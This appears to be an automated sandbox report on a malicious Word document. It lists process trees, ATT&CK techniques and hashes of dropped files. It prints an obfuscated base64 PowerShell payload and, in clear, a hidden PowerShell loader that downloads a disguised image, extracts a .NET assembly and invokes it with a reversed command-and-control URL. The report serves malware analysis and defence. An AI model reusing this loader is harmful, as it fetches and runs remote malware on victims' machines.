௴QwBv㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴D0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴ZQBU㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴e㌟ ⥜ ㈄ ꒱ ௴B0㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴UwB1㌟ ⥜ ㈄ ꒱ ௴GI㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴aQBu㌟ ⥜ ㈄ ꒱ ௴Gc㌟ ⥜ ㈄ ꒱ ௴K㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bh㌟ ⥜ ㈄ ꒱ ௴HI㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BJ㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴Hg㌟ ⥜ ㈄ ꒱ ௴L㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴YgBh㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴ZQ㌟ ⥜ ㈄ ꒱ ௴2㌟ ⥜ ㈄ ꒱ ௴DQ㌟ ⥜ ㈄ ꒱ ௴T㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴ZwB0㌟ ⥜ ㈄ ꒱ ௴Gg㌟ ⥜ ㈄ ꒱ ௴KQ㌟ ⥜ ㈄ ꒱ ௴7㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴YwBv㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴BC㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴WwBT㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴EM㌟ ⥜ ㈄ ꒱ ௴bwBu㌟ ⥜ ㈄ ꒱ ௴HY㌟ ⥜ ㈄ ꒱ ௴ZQBy㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴XQ㌟ ⥜ ㈄ ꒱ ௴6㌟ ⥜ ㈄ ꒱ ௴Do㌟ ⥜ ㈄ ꒱ ௴RgBy㌟ ⥜ ㈄ ꒱ ௴G8㌟ ⥜ ㈄ ꒱ ௴bQBC㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴cwBl㌟ ⥜ ㈄ ꒱ ௴DY㌟ ⥜ ㈄ ꒱ ௴N㌟ ⥜ ㈄ ꒱ ௴BT㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴cgBp㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Zw㌟ ⥜ ㈄ ꒱ ௴o㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴YgBh㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴ZQ㌟ ⥜ ㈄ ꒱ ௴2㌟ ⥜ ㈄ ꒱ ௴DQ㌟ ⥜ ㈄ ꒱ ௴QwBv㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴p㌟ ⥜ ㈄ ꒱ ௴Ds㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bs㌟ ⥜ ㈄ ꒱ ௴G8㌟ ⥜ ㈄ ꒱ ௴YQBk㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴BB㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴cwBl㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YgBs㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴9㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴WwBT㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴cwB0㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴FI㌟ ⥜ ㈄ ꒱ ௴ZQBm㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴ZQBj㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴aQBv㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴LgBB㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴cwBl㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴YgBs㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴XQ㌟ ⥜ ㈄ ꒱ ௴6㌟ ⥜ ㈄ ꒱ ௴Do㌟ ⥜ ㈄ ꒱ ௴T㌟ ⥜ ㈄ ꒱ ௴Bv㌟ ⥜ ㈄ ꒱ ௴GE㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴o㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴YwBv㌟ ⥜ ㈄ ꒱ ௴G0㌟ ⥜ ㈄ ꒱ ௴bQBh㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴BC㌟ ⥜ ㈄ ꒱ ௴Hk㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴KQ㌟ ⥜ ㈄ ꒱ ௴7㌟ ⥜ ㈄ ꒱ ௴CQ㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴B5㌟ ⥜ ㈄ ꒱ ௴H㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴ZQ㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴D0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴bwBh㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴ZQBk㌟ ⥜ ㈄ ꒱ ௴EE㌟ ⥜ ㈄ ꒱ ௴cwBz㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴bQBi㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴eQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Ec㌟ ⥜ ㈄ ꒱ ௴ZQB0㌟ ⥜ ㈄ ꒱ ௴FQ㌟ ⥜ ㈄ ꒱ ௴eQBw㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴K㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴bgBs㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴Yg㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Ek㌟ ⥜ ㈄ ꒱ ௴Tw㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴Eg㌟ ⥜ ㈄ ꒱ ௴bwBt㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴Jw㌟ ⥜ ㈄ ꒱ ௴p㌟ ⥜ ㈄ ꒱ ௴Ds㌟ ⥜ ㈄ ꒱ ௴J㌟ ⥜ ㈄ ꒱ ௴Bt㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bo㌟ ⥜ ㈄ ꒱ ௴G8㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴D0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴eQBw㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴LgBH㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴BN㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴Bo㌟ ⥜ ㈄ ꒱ ௴G8㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴o㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴VgBB㌟ ⥜ ㈄ ꒱ ௴Ek㌟ ⥜ ㈄ ꒱ ௴Jw㌟ ⥜ ㈄ ꒱ ௴p㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴SQBu㌟ ⥜ ㈄ ꒱ ௴HY㌟ ⥜ ㈄ ꒱ ௴bwBr㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴K㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴k㌟ ⥜ ㈄ ꒱ ௴G4㌟ ⥜ ㈄ ꒱ ௴dQBs㌟ ⥜ ㈄ ꒱ ௴Gw㌟ ⥜ ㈄ ꒱ ௴L㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Fs㌟ ⥜ ㈄ ꒱ ௴bwBi㌟ ⥜ ㈄ ꒱ ௴Go㌟ ⥜ ㈄ ꒱ ௴ZQBj㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴WwBd㌟ ⥜ ㈄ ꒱ ௴F0㌟ ⥜ ㈄ ꒱ ௴I㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴o㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴d㌟ ⥜ ㈄ ꒱ ௴B4㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴LgBP㌟ ⥜ ㈄ ꒱ ௴EQ㌟ ⥜ ㈄ ꒱ ௴S㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴v㌟ ⥜ ㈄ ꒱ ௴D㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴O㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴v㌟ ⥜ ㈄ ꒱ ௴DE㌟ ⥜ ㈄ ꒱ ௴Nw㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴DI㌟ ⥜ ㈄ ꒱ ௴OQ㌟ ⥜ ㈄ ꒱ ௴u㌟ ⥜ ㈄ ꒱ ௴DU㌟ ⥜ ㈄ ꒱ ௴Nw㌟ ⥜ ㈄ ꒱ ௴x㌟ ⥜ ㈄ ꒱ ௴C4㌟ ⥜ ㈄ ꒱ ௴Nw㌟ ⥜ ㈄ ꒱ ௴w㌟ ⥜ ㈄ ꒱ ௴DE㌟ ⥜ ㈄ ꒱ ௴Lw㌟ ⥜ ㈄ ꒱ ௴v㌟ ⥜ ㈄ ꒱ ௴Do㌟ ⥜ ㈄ ꒱ ௴c㌟ ⥜ ㈄ ꒱ ௴B0㌟ ⥜ ㈄ ꒱ ௴HQ㌟ ⥜ ㈄ ꒱ ௴a㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴L㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴YQB0㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴dgBh㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴bw㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴L㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴YQB0㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴dgBh㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴bw㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴C㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴L㌟ ⥜ ㈄ ꒱ ௴㌟ ⥜ ㈄ ꒱ ௴g㌟ ⥜ ㈄ ꒱ ௴Cc㌟ ⥜ ㈄ ꒱ ௴Z㌟ ⥜ ㈄ ꒱ ௴Bl㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴YQB0㌟ ⥜ ㈄ ꒱ ௴Gk㌟ ⥜ ㈄ ꒱ ௴dgBh㌟ ⥜ ㈄ ꒱ ௴GQ㌟ ⥜ ㈄ ꒱ ௴bw㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴Cw㌟ ⥜ ㈄ ꒱ ௴JwBS㌟ ⥜ ㈄ ꒱ ௴GU㌟ ⥜ ㈄ ꒱ ௴ZwBB㌟ ⥜ ㈄ ꒱ ௴HM㌟ ⥜ ㈄ ꒱ ௴bQ㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴Cw㌟ ⥜ ㈄ ꒱ ௴Jw㌟ ⥜ ㈄ ꒱ ௴n㌟ ⥜ ㈄ ꒱ ௴Ck㌟ ⥜ ㈄ ꒱ ௴KQ㌟ ⥜ ㈄ ꒱ ௴=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㌟ ⥜ ㈄ ꒱ ௴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ODH/08/17.29.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
037914866445bcf8444554e56d6d12d1

SHA1
2637e8f21a20f353538253e9db8d5b9657f07762

SHA256
3e0db2f70a2cd747adacc5af35c7a6df82b8f37b034fee9c5c02c483971193ed

SHA512
8720ad71535d090c3d5e8d3b6ae97b2cd93ce62a858f38183f1087ccb0f2e7a5a3aef70f0afd81d0a939408f25376f52ca7583b8d934557ee7fcc70f767fd05d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
ade8ab801b7bfb995306bc73cb9fcd34

SHA1
57739905772966383f1fb2032e7fa0e9ce9abe46

SHA256
27fa29f456c36680fa0eb9efe61ebce13a8982593a60c06e92f446133c0573ce

SHA512
ce7afbe5d0f57b524ce7d037dfb1e9a83c79bd5224a691012d8e4de5cf19b56cd4914ab211e30cda64b977db9fb59f78ab3d0322ccca760bb62d6555b54386e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
cc862e3775dd6a4a3481adf0f5c230f7

SHA1
0115847d31fd8c68100b45256d770f4245b9f86c

SHA256
4051fd0a5089f04c6f5253495413ef8c14fc6ea784a4c285084f826c0eb931b3

SHA512
fd898295ee15995accd5a544f5ce2f9ad94cc69d063acdb1c65f66549868c9912180e7702bc7048eda5ca502763860a3043040fa544fade059d86590804d445c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
204aef1b1c0b520bc16e3cf104a43065

SHA1
488d2ddc011c03457175864f940f28862fa69513

SHA256
ae1a65796885dd9c69344e3dfa3bfa31a245349e44bb3b6f8e780243c6564570

SHA512
ac9e74b4988a67132387db6c59bc66eeec110576fde4c14385e4c88615ea2797d59df0a27a0291fc03e68abcc0c3c5cb71c7c7359fb4b6681340d04c70b837c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D6A85D7A-3623-45CD-A881-0AE0F3220215}.FSD

Filesize
128KB

MD5
34bb1e9aeae529afb2b5f0377ead03a3

SHA1
c76fa0b290d897b07fea97fba6598b258a8bd2ec

SHA256
7c882acd7a7b940500fe03fc2f8e965cd4938ecc11d1d80b4faff338e87e6f50

SHA512
02ddeb3c41019c952a459592d6d1211c1343fb38a6807aa9302e3aae7a9313306c070944bd63de178dbe4faf4a9afa5ede5567c4b819d5d3bc690384efdaa9b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\probuttersmoothbunwhichireallylovetoeastwithgreattastewhichevennobodyknowwhatsitsisbecause________verycrutebutterbun[1].doc

Filesize
81KB

MD5
3c068c1b622afbe60650f8f8cd85b594

SHA1
29f53dbfcbf23b13ad89bc348657fe31cf648752

SHA256
6ce2f98dabddfa3d155c5cfe4481f152880310786cf9dc83c513c663fd47567c

SHA512
26e5ce24bf6a4c34fe8c0534df4c9fda3cb264ea54acdf29c79d4927d805f09109261ad298fab19fad7da8ee2d14f87b6557ca37213cdc072d74a5ca86b1e364

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab31BB.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{21EB3CE3-4062-46BC-859E-B30261968761}

Filesize
128KB

MD5
7a926d09561c37d267edd8d5c8dea19f

SHA1
766e4fba3d05c5ec5420cb00496486bd846bf95e

SHA256
bc2c0d010feac1b2357f7eafb3ee044fb208d0e944620e8c1ab4ff47dd3106b5

SHA512
ae505020559497a302fd17d017757bb5571c6716b251da20f9577868cd9bdecde57ddcb36d83aa8347377af6a39d812adff2b28637b7dbb8daba0e2ca599ea1d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\URBRK670.txt

Filesize
68B

MD5
3af4b5fdef4f7b27261d61c8e4269403

SHA1
30439a7f27017a2ad5889bf35c13bd0d951d52d8

SHA256
4a9f2f8fa4cf2cf8316044d32342e2c4abb43938f6945da84c01b712b19ac719

SHA512
2c3ad039e7adb9476f3b6de8e4c241bdac3026284ddee74bae9683753ef828c96ad7e1c6a17e58f95467a8cb2730661af254afa630e3d9510dcbb41cfbcf016c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
37c7e7288634e162c66cfeb5f583bdbb

SHA1
328af1820056e1cbbc635b3be17d5281e97a798f

SHA256
0b031667533564a0419ef30766d1aad61937ac4ec4f9500d5792b566c7251c32

SHA512
55d77375845dfacd7e597adc9912c3a971e4f30b6cd9f9010fc5a7340b4ae34e1670af01f987d43d4f487c4f41246f06fb97054bc0a5fdfef945394b9766247e

Download Submit
C:\Users\Admin\AppData\Roaming\pictgrowingbuttersmoothgoo.vBS

Filesize
178KB

MD5
c512fe5933e3bab7d51bb8aa42e36f16

SHA1
7e1102a5a6b95b857fa46482106ba5345ffee142

SHA256
bc17bee8ee08d07090d4f4c5724bdd827d47a6530b1961c2ba77bf86995028a6

SHA512
b8cb82dcee3d5559015fffceee15ef6bacf4c90c5d62c1d98e34b620501ede8c3ca3e859bccc25abb69c89fc04f2cefd60a6b1364362bd0ca582cb75f6f2a328

Download Submit
memory/1636-19-0x0000000072C2D000-0x0000000072C38000-memory.dmp

Filesize
44KB

Download
memory/1636-17-0x000000002F431000-0x000000002F432000-memory.dmp

Filesize
4KB

Download
memory/1636-21-0x0000000003810000-0x0000000003812000-memory.dmp

Filesize
8KB

Download
memory/1636-124-0x0000000072C2D000-0x0000000072C38000-memory.dmp

Filesize
44KB

Download
memory/1636-138-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1636-139-0x0000000072C2D000-0x0000000072C38000-memory.dmp

Filesize
44KB

Download
memory/2180-1-0x0000000072C2D000-0x0000000072C38000-memory.dmp

Filesize
44KB

Download
memory/2180-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2180-93-0x0000000072C2D000-0x0000000072C38000-memory.dmp

Filesize
44KB

Download
memory/2180-22-0x0000000002EE0000-0x0000000002EE2000-memory.dmp

Filesize
8KB

Download